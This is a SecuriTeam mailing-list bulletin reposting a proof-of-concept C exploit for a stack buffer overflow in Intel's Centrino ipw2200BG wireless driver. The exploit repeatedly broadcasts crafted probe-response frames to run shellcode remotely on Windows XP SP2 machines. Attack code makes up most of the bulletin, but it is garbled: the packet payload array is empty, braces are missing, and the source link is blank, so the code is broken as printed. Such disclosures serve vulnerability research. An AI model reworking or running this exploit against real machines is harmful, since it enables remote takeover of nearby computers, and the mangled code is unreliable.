[EXPL] Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)


A buffer overflow vulnerability has been discovered in the Intel Centrino
ipw2200 integrated wireless card driver.


* This is a PoC exploit for Intel Centrino ipw2200 integrated wireless
* Author:
* Giuseppe Gottardi (aka oveRet) <overet@xxxxxxxxxxxxxxx>
* Senior Security Engineer at Communication Valley S.p.A.
* This version of code is only a Proof of Concept stack based exploit
that demonstrates
* the remote code execution on ipw2200 driver. It execute a beep user
space shellcode.
* It only works on XP SP2 ITA and it was only tested with
version of
* IPW2200BG driver.
* Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their

#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV "wlan0"
#define DELAY 0.1

char wifi_packet[]=
//SSID len
//RET address

int send_probe_response(char *dev)
struct sockaddr sa;
int sockfd;
int rc;

#ifdef DEBUG
int i;
u_char *moe = wifi_packet;
#endif /* DEBUG */

memset(&sa, 0, sizeof(struct sockaddr));

sa.sa_family = PF_PACKET;
memcpy(sa.sa_data, dev, sizeof(sa.sa_data));

#ifdef DEBUG
for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
if (!(i%32)) printf("\n");
printf("%02x ", *moe);
#endif /* DEBUG */

if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0)
return -1;

if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa,
sizeof(sa))) < 0) {
return -1;

return rc;

int main(int argc, char *argv[])
int rc;

printf("waiting for beep shellcode execution...\n");

for (;;) {
rc = send_probe_response(DEV);

return 0;


The original article can be found at:


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages